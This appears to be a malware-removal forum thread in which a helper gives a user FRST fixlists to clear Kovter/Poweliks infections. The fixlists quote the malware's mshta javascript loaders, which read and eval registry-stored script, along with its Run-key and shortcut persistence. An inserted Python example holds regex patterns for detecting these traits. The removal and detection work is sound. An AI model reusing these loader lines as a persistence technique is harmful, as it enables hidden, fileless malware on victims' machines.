ando

Seem to be infected with Kovter or Kotver and/or Poweliks


Steve,

Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

CloseProcesses:
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [**moxwisz<*>] => "C:\Windows\system32\mshta.exe" javascript:GN15ifR="sqVwu";DN1=new%20ActiveXObject("WScript.Shell");tQkrN2Uo="kSx4H0";R47yRN=DN1.RegRead("HKCU\\software\\hsyamdeihs\\oedg");Ey78YMP="KwNWPE2";eval(R47y (the data entry has 21 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [**fbln<*>] => "C:\Users\louisec\AppData\Local\7c8a1e\db2476.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [YQTPack] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\louisec\AppData\Local\Awdsworks\bwpsetlg.dll
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [Uhnmedia] => regsvr32.exe C:\Users\louisec\AppData\Local\Uhnmedia\bwpsetlg.dll <===== ATTENTION
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [**wjghlqtw<*>] => "C:\Windows\system32\mshta.exe" javascript:Fs7EBT6P="Dp0";g4x=new%20ActiveXObject("WScript.Shell");C4QSj="N7Y9s3";I8y2HH=g4x.RegRead("HKCU\\software\\xjlcaicix\\wrzzbxmcw");HiFFDK6k="knQkK6o";eval(I8y (the data entry has 20 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\...\Run: [**kqawmlub<*>] => "C:\Users\louisec\AppData\Local\bc2b\34b5.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5be9.lnk [2016-10-03]
Startup: C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6fafe.lnk [2016-10-03]
Startup: C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fbcd.lnk [2016-11-04]
URLSearchHook: [S-1-5-21-2629942752-1555253383-3497716934-1178] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159 -> {1062FA11-F6F7-46A1-BF36-93CBBD379024} URL = 
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
2016-06-17 17:54 - 2016-06-17 17:54 - 0004570 _____ () C:\Users\louisec\AppData\Roaming\1047x576black.png
2016-06-17 17:54 - 2016-06-17 17:54 - 0001779 _____ () C:\Users\louisec\AppData\Roaming\16ps.png
2016-06-17 17:54 - 2016-06-17 17:54 - 0002069 _____ () C:\Users\louisec\AppData\Roaming\40-nonlatin.conf
2016-06-17 17:54 - 2016-06-17 17:54 - 0001167 _____ () C:\Users\louisec\AppData\Roaming\403-14.htm
2016-06-17 17:54 - 2016-06-17 17:54 - 0001054 _____ () C:\Users\louisec\AppData\Roaming\alienfx.png
2016-06-17 17:54 - 2016-06-17 17:54 - 0000734 _____ () C:\Users\louisec\AppData\Roaming\Arabic- README-en
2016-06-17 17:54 - 2016-06-17 17:54 - 0001279 _____ () C:\Users\louisec\AppData\Roaming\aspnet.config
2016-06-17 17:53 - 2016-06-17 17:53 - 0002978 _____ () C:\Users\louisec\AppData\Roaming\basic.css
2016-06-17 17:53 - 2016-06-17 17:53 - 0000100 _____ () C:\Users\louisec\AppData\Roaming\blank.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0000524 _____ () C:\Users\louisec\AppData\Roaming\BMC blue 4.ADO
2016-06-17 17:53 - 2016-06-17 17:53 - 0000329 _____ () C:\Users\louisec\AppData\Roaming\Boa_Vista
2016-06-17 17:53 - 2016-06-17 17:53 - 0001088 _____ () C:\Users\louisec\AppData\Roaming\bookmarks.collapse.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0001289 _____ () C:\Users\louisec\AppData\Roaming\Brass - Raw.3PP
2016-06-17 17:53 - 2016-06-17 17:53 - 0000077 _____ () C:\Users\louisec\AppData\Roaming\Brunei
2016-06-17 17:53 - 2016-06-17 17:53 - 0004914 _____ () C:\Users\louisec\AppData\Roaming\b_it.jpg
2016-06-17 17:53 - 2016-06-17 17:53 - 0000101 _____ () C:\Users\louisec\AppData\Roaming\Casey
2016-06-17 17:53 - 2016-06-17 17:53 - 0001978 _____ () C:\Users\louisec\AppData\Roaming\caution.tif
2016-06-17 17:53 - 2016-06-17 17:53 - 0001256 _____ () C:\Users\louisec\AppData\Roaming\chunker.output.standalone.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0003878 _____ () C:\Users\louisec\AppData\Roaming\circleround_selectionsubpicture.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0000524 _____ () C:\Users\louisec\AppData\Roaming\Cool Gray 9 bl 4.ADO
2016-06-17 17:53 - 2016-06-17 17:53 - 0001464 _____ () C:\Users\louisec\AppData\Roaming\cp_keyboard.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0000027 _____ () C:\Users\louisec\AppData\Roaming\CST6
2016-06-17 17:53 - 2016-06-17 17:53 - 0001429 _____ () C:\Users\louisec\AppData\Roaming\delete_1.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0000065 _____ () C:\Users\louisec\AppData\Roaming\Douala
2016-06-17 17:53 - 2016-06-17 17:53 - 0002382 _____ () C:\Users\louisec\AppData\Roaming\eamonm.inf
2016-06-17 17:53 - 2016-06-17 17:53 - 0001018 _____ () C:\Users\louisec\AppData\Roaming\ebnf.table.bgcolor.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0000077 _____ () C:\Users\louisec\AppData\Roaming\El_Aaiun
2016-06-17 17:53 - 2016-06-17 17:53 - 0001541 _____ () C:\Users\louisec\AppData\Roaming\f12.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0001127 _____ () C:\Users\louisec\AppData\Roaming\f37.png
2016-06-17 17:53 - 2016-06-17 17:53 - 0001106 _____ () C:\Users\louisec\AppData\Roaming\foil.title.size.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0001246 _____ () C:\Users\louisec\AppData\Roaming\fop.extensions.xml
2016-06-17 17:53 - 2016-06-17 17:53 - 0003255 _____ () C:\Users\louisec\AppData\Roaming\GBK-EUC-V
2016-06-17 17:53 - 2016-06-17 17:53 - 0001106 _____ () C:\Users\louisec\AppData\Roaming\GIF 64 No Dither.irs
2016-06-17 17:53 - 2016-06-17 17:53 - 0001204 _____ () C:\Users\louisec\AppData\Roaming\Glace_Bay
2016-06-17 17:52 - 2016-06-17 17:52 - 0001115 _____ () C:\Users\louisec\AppData\Roaming\graphic.default.extension.xml
2012-01-23 19:00 - 2012-01-23 19:00 - 0003599 _____ () C:\Users\louisec\AppData\Roaming\HogwashAlameda.MBF
1993-06-13 18:00 - 1993-06-13 18:00 - 0049794 _____ () C:\Users\louisec\AppData\Roaming\Kolinsky.P
2014-09-14 14:59 - 2014-09-14 15:05 - 0000824 _____ () C:\ProgramData\hpzinstall.log
C:\Users\Administrator\AppData\Local\Temp\ApplnchConfig.exe
C:\Users\louisec\AppData\Local\Temp\ApplnchConfig.exe
C:\Users\louisec\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp8d8nbd.dll
Shortcut: C:\Users\louisec\AppData\Local\bc2b\34b5.lnk -> C:\Users\louisec\AppData\Local\bc2b\6452.bat ()
Shortcut: C:\Users\louisec\AppData\Local\7c8a1e\db2476.lnk -> C:\Users\louisec\AppData\Local\7c8a1e\d6ff3d.bat ()
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:3251 [0]
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:3299 [0]
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:3400 [0]
AlternateDataStreams: C:\Users\louisec\Documents\$2000 x 5 people_files:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\ACOM:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Cafe:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Camp:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Conference Directory:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Correspondence:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Crisis Centre:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Directory:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\EIP:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Flyers:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Forms:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\FW two photos from Stepping Stones_files:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Groups:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Invoices:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Kids Quest:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Order of Service:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Payroll:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Petty Cash:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Policies & Procedures:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Publication:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Rolling Stones:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Rosters:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Scripture:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\signs:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Small Group Study:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Staff:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Standard Forms:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Stationery:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Stepping Stone:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Stones:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\louisec\Documents\Website:Roxio EMC Stream [38]
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\Software\Classes\6d8069: "C:\Windows\system32\mshta.exe" "javascript:I3jSqGAl="HfVbg2";YT74=new ActiveXObject("WScript.Shell");Dn2EcvDt="owW2";Lb4F9e=YT74.RegRead("HKCU\\software\\hsyamdeihs\\oedg");OU7ut7="F7I";eval(Lb4F9e);COzjbgC5="X4gHYN1";" <===== ATTENTION
HKU\S-1-5-21-2629942752-1555253383-3497716934-1159\Software\Classes\94bf: "C:\Windows\system32\mshta.exe" "javascript:EI5X3ex="ngpBIFgf";ue7=new ActiveXObject("WScript.Shell");ql6bb="mZGc";Hq8N6n=ue7.RegRead("HKCU\\software\\xjlcaicix\\wrzzbxmcw");e0LSLB="4vf5yzIS";eval(Hq8N6n);eE7QhC8="0b7Tcz";" <===== ATTENTION
C:\Users\louisec\AppData\Local\7c8a1e
C:\Users\louisec\AppData\Local\Awdsworks
C:\Users\louisec\AppData\Local\Uhnmedia
C:\Users\louisec\AppData\Local\bc2b
C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5be9.lnk
C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6fafe.lnk
C:\Users\louisec\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fbcd.lnk
Reboot:
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Right-Click on FRST64, select "Run as administrator".

Press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.
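
The fixlist above removes Kovter's fileless persistence chain: a Run value whose name regedit cannot display launches mshta.exe, which reads an obfuscated script from a registry key and evals it, while hex-named .lnk/.bat pairs and a custom Software\Classes handler re-seed that loader. As an added example, not part of this thread or of FRST itself, the Python below triages FRST-style log lines for exactly those traits and pulls out the registry key that holds the script body; every SID, value name, directory name and key in the sample lines is a constructed placeholder.

```python
import re

# Constructed FRST-style log lines modelled on the Kovter entries in the fixlist above.
# SIDs, value names, directory names and the registry key are invented placeholders.
SAMPLE_LOG = r"""
HKU\S-1-5-21-111\...\Run: [**abcd<*>] => "C:\Windows\system32\mshta.exe" javascript:a1="x";b2=new%20ActiveXObject("WScript.Shell");c3=b2.RegRead("HKCU\\software\\placeholderkey\\val");eval(c3); <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-111\...\Run: [**efgh<*>] => "C:\Users\user\AppData\Local\1a2b\3c4d.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-111\...\Run: [OneDrive] => C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
HKU\S-1-5-21-111\Software\Classes\9f8e: "C:\Windows\system32\mshta.exe" "javascript:z9="q";y8=new ActiveXObject("WScript.Shell");x7=y8.RegRead("HKCU\\software\\placeholderkey\\val");eval(x7);" <===== ATTENTION
Startup: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9a8b.lnk [2016-10-03]
"""

MSHTA_LOADER = re.compile(r'mshta\.exe"?\s+"?javascript:', re.IGNORECASE)
REGREAD = re.compile(r'RegRead\("((?:[^"\\]|\\.)*)"\)')          # key whose data the loader evals
INVALID_NAME = re.compile(r'\\Run: \[\*\*[^\]]*<\*>\]')           # FRST marks undisplayable names this way
LNK_TARGET = re.compile(r'\\Run: \[[^\]]*\] => "?([^"\s]+\.lnk)"?', re.IGNORECASE)
CLASSES_KEY = re.compile(r'\\Software\\Classes\\[0-9a-f]{2,8}:', re.IGNORECASE)
STARTUP_HEX_LNK = re.compile(r'^Startup: .*\\[0-9a-f]{4,8}\.lnk\b', re.IGNORECASE)

def triage_frst_lines(text):
    """Return one finding per line that shows a Kovter-style persistence trait."""
    findings = []
    for line in (l.strip() for l in text.splitlines()):
        reasons, payload_key = [], ""
        if MSHTA_LOADER.search(line):
            reasons.append("mshta javascript loader")
            m = REGREAD.search(line)
            if m:  # un-escape the JavaScript string literal to get the real key path
                payload_key = m.group(1).replace("\\\\", "\\")
                reasons.append("reads script body from registry")
            if "eval(" in line:
                reasons.append("eval of registry data")
            if CLASSES_KEY.search(line):
                reasons.append("custom file-class handler runs mshta")
        if INVALID_NAME.search(line):
            reasons.append("Run value name with invalid characters")
        m = LNK_TARGET.search(line)
        if m and "\\appdata\\" in m.group(1).lower():
            reasons.append("Run value launches .lnk under AppData")
        if STARTUP_HEX_LNK.match(line):
            reasons.append("hex-named Startup shortcut")
        if reasons:
            findings.append({"line": line, "reasons": reasons, "payload_key": payload_key})
    return findings

if __name__ == "__main__":
    for f in triage_frst_lines(SAMPLE_LOG):
        print(f["reasons"], f["payload_key"] or "-", f["line"][:60])
```

The extracted payload_key is the value to export and inspect (and to include in the fixlist) so the script body goes with the loader, otherwise any surviving launcher re-creates the Run entries.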


Hi,

Thanks for the help with this... much appreciated.

The fixlog.txt is attached.

Fixlog.txt

I'll be away for about 5 days (till late Friday night, 11 Nov) so won't be able to do any more on this machine until then.

Is there likely to be any further work to do? Or is the fixlog.txt you requested just for confirmation that it worked?

Cheers,

Steve


Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.

I will close this topic for the time being. Send me a PM when you get back and I will reopen this support topic.


Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

C:\Users\louisec\AppData\Local\Temp\ApplnchConfig.exe
C:\Users\stevea.PATHWAYSCHURCH\AppData\Local\Temp\ApplnchConfig.exe
C:\Users\supersteve\AppData\Local\Temp\ApplnchConfig.exe
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
CustomCLSID: HKU\S-1-5-21-2629942752-1555253383-3497716934-1159_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\louisec\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll => No File
AlternateDataStreams: C:\Users\louisec\Documents\Invoices:Roxio EMC Stream [38]
AlternateDataStreams: C:\Users\supersteve\Documents\ERA_Installer_x64_en_US.exe:com.apple.quarantine [45]
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.


Let's take a fresh look.

Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.

Be sure to let me know how things are running.


Thread Closed

Reason: Lack of Response

PM either Kevin, Elise, or Arthur to have this thread reopened.

All posters requesting Malware Removal assistance are required to follow all procedures in the thread titled START HERE; if you don't, we are just going to send you back to this thread.
